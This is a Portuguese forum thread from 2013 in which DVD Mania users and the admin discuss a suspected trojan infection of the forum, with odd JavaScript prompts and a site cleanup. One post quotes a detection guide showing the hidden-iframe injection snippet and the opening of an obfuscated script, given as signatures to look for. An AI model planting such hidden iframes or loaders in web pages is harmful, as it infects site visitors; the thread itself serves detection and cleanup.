Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Sugestões para melhorar o site. Indicação de erros e problemas com as páginas. Outros assuntos relacionados com a DVD Mania.
Responder
ruben
Especialista
Especialista
Mensagens: 1346
Registado: agosto 9, 2009, 10:42 pm
Localização: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por ruben » setembro 5, 2013, 5:31 pm

Sim e agora aparece esse pop up, nunca tinha-me aparecido antes...

elfaria
Fanático
Fanático
Mensagens: 942
Registado: janeiro 8, 2011, 11:50 pm

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por elfaria » setembro 5, 2013, 5:42 pm

Por aqui tudo bem; nem sinais de vírus nem vestígios de trojan: Comprem um Mac :mrgreen:

Avatar do Utilizador
Rui Santos
Site Admin
Mensagens: 5634
Registado: junho 4, 2001, 11:42 pm
Localização: Portugal - Lisboa / MAC
Contacto:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por Rui Santos » setembro 5, 2013, 6:17 pm

Ruben, o popup é exatamente igual ao que o anjo postou?
Rui Santos - 48 Anos | 17 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB DVDMania | FB Collectors HV-PT

ruben
Especialista
Especialista
Mensagens: 1346
Registado: agosto 9, 2009, 10:42 pm
Localização: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por ruben » setembro 5, 2013, 6:26 pm

Por acaso não reparei se dizia o mesmo, mas quando aparecer outra vez coloco print aqui.

Apareceu com a página deformada.

JoséMiguel
DVD Maníaco
DVD Maníaco
Mensagens: 3039
Registado: agosto 30, 2011, 9:33 pm
Localização: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por JoséMiguel » setembro 5, 2013, 7:32 pm

Estes popups não são popups.

1) A 1ª defesa do Avast falhou (não detecta o vírus tipo A, hospedado e executado dentro do DVD Mania, que dá ordem para executar o Vírus tipo B, localizado em site externo X.

2) A 2ª defesa do Avast falhou também pois não bloqueia o url malicioso do site n (url sempre diferente, que muda todos os dias.)

3) Este popup, que não é popup (que os tenho desligado no Firefox) parece ser uma mensagem do javascript a pedir confirmação para executar o vírus final. O utilizador dará ordem para infectar o seu próprio PC, caso esteja distraído. Eu aqui não tenho a certeza se é mesmo uma mensagem oficial do javascript a pedir confirmação, ou se já será uma aplicação não autorizada e os nossos PC's já estarão comprometidos.

Desactivar temporariamente o fórum não tem interesse. O que tem interesse é usar este tópico para encontrar uma solução. Rui Santos, já experimenteste ver se não existem ficheiros .js lá no ftp? Da outra vez existiam aqueles 404.js, que o Avast não detectava (o Avast só detectava os sites maliciosos, que esses 404.js mandavam executar).

Se tiver lá algum ficheiro terminado em .js coloca aqui os nomes deles para a gente dar uma olhadela.

PS: Esta situação ainda não foi motivo de pânico para mim, porque 99,9% dos vírus requerem autorização pelo próprio utilizador, antes de serem executados, como exemplo o tal "Popup" aqui mostrado anteriormente.

ruben
Especialista
Especialista
Mensagens: 1346
Registado: agosto 9, 2009, 10:42 pm
Localização: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por ruben » setembro 6, 2013, 12:11 am

Sim eu sei José, também tenho essa tralha toda bloqueada, só pode ser vírus, não é normal pedir aquilo e principalmente neste fórum.

Ainda não me apareceu o pop... só o apanhei 2x, na 2ª avisei aqui.

Anjo
Especialista
Especialista
Mensagens: 1693
Registado: janeiro 13, 2003, 5:43 pm

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por Anjo » setembro 6, 2013, 1:46 am

JoséMiguel Escreveu:3) Este popup, que não é popup (que os tenho desligado no Firefox) parece ser uma mensagem do javascript a pedir confirmação para executar o vírus final. O utilizador dará ordem para infectar o seu próprio PC, caso esteja distraído. Eu aqui não tenho a certeza se é mesmo uma mensagem oficial do javascript a pedir confirmação, ou se já será uma aplicação não autorizada e os nossos PC's já estarão comprometidos.
Sim, não é uma tradicional janela pop up. Também as tenho bloqueadas no Firefox. Usei a expressão para se perceber. A imagem que postei é um exemplo parecido que fui buscar à net ao calhas. Se me aparecer novamente também tiro um print screen.

A minha opinião é igualmente que se trata de javascript a pedir autorização para executar, como dizes. Porém, o meu computador está limpinho limpinho :mrgreen:. Tenho sempre tudo actualizado e em ordem. Just in case, depois desta história, fiz um full scan com antivirus, malwarebytes e hitmanpro: nenhum bicho detectado.

Avatar do Utilizador
Rui Santos
Site Admin
Mensagens: 5634
Registado: junho 4, 2001, 11:42 pm
Localização: Portugal - Lisboa / MAC
Contacto:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por Rui Santos » setembro 6, 2013, 11:48 pm

Só para vos avisar que tenho acompanhado de muito perto o tópico e lido tudo com atenção.
Este FdS volto ao ataque e respondo a algumas das vossas perguntas.

Obrigada a todos!
Rui Santos - 48 Anos | 17 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB DVDMania | FB Collectors HV-PT

ruben
Especialista
Especialista
Mensagens: 1346
Registado: agosto 9, 2009, 10:42 pm
Localização: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por ruben » setembro 7, 2013, 3:51 pm

E pronto voltou a aparecer o pop, aqui tá o print:


Imagem

Avatar do Utilizador
Rui Santos
Site Admin
Mensagens: 5634
Registado: junho 4, 2001, 11:42 pm
Localização: Portugal - Lisboa / MAC
Contacto:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por Rui Santos » setembro 11, 2013, 12:51 am

Fiz algumas alterações / limpezas hoje.

Verifiquem por favor se têm algum alarme, incluindo o entrar com as fontes deformadas.
Rui Santos - 48 Anos | 17 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB DVDMania | FB Collectors HV-PT

Pedro Pereira de Carvalho
DVD Maníaco
DVD Maníaco
Mensagens: 7865
Registado: junho 12, 2001, 6:51 pm
Localização: Portugal

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por Pedro Pereira de Carvalho » setembro 14, 2013, 11:47 pm

Mais um ataque
Exploit Invisible IFrame Injection (type 1707)

(in http://blog.unmaskparasites.com/2009/01 ... injection/ )
Detection
Temporarily disable JavaScript in your browser (if you don’t want to get infected) and open your site. In the browser’s menu choose “view source” and search for the following code:

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>

It is usually located right after the <body> tag or after the closing </html> tag.

If found, this hidden IFrame is followed by a long obfuscated script that does all the bad things. This script starts with a code that looks like this:

<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){...

The actual content of this script vary from site to site but it always starts with a function with a long name containing random chars and digits.

The easier and safer way to detect this exploit is to check suspected web pages with Unmask Parasites http://www.unmaskparasites.com/

outras soluções em http://eisabainyo.net/weblog/2009/04/06 ... on-attack/
Pedro Pereira de Carvalho - 53 anos - Lisboa

Avatar do Utilizador
Rui Santos
Site Admin
Mensagens: 5634
Registado: junho 4, 2001, 11:42 pm
Localização: Portugal - Lisboa / MAC
Contacto:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por Rui Santos » setembro 15, 2013, 12:07 am

Hoje domingo ao final do dia reabro o Forum e termino novamente a limpeza do mesmo.
Até lá vou escrevendo no FB no nosso grupo.
Rui Santos - 48 Anos | 17 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB DVDMania | FB Collectors HV-PT

JoséMiguel
DVD Maníaco
DVD Maníaco
Mensagens: 3039
Registado: agosto 30, 2011, 9:33 pm
Localização: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Mensagem por JoséMiguel » setembro 17, 2013, 2:52 am

Venho apenas agradecer ao Rui Santos o trabalho que tem tido, a limpar o vírus do fórum. yes-)

Estive uma semana sem vir aqui, porque apanhei um valente susto e entrei mesmo em pânico, na semana passada. Eu tenho o Windows 7 e Firefox, muito vulnerável ao vírus em questão, tanto que o Avast cortou e bloqueou mesmo o acesso ao DVD Mania.

Hoje entrei primeiro com o navegador Google Chrome, e depois com o Firefox, e o site pareceu-me bem à primeira vista. (O Avast não deu alarme e não bloqueou o url do DVD Mania).

Responder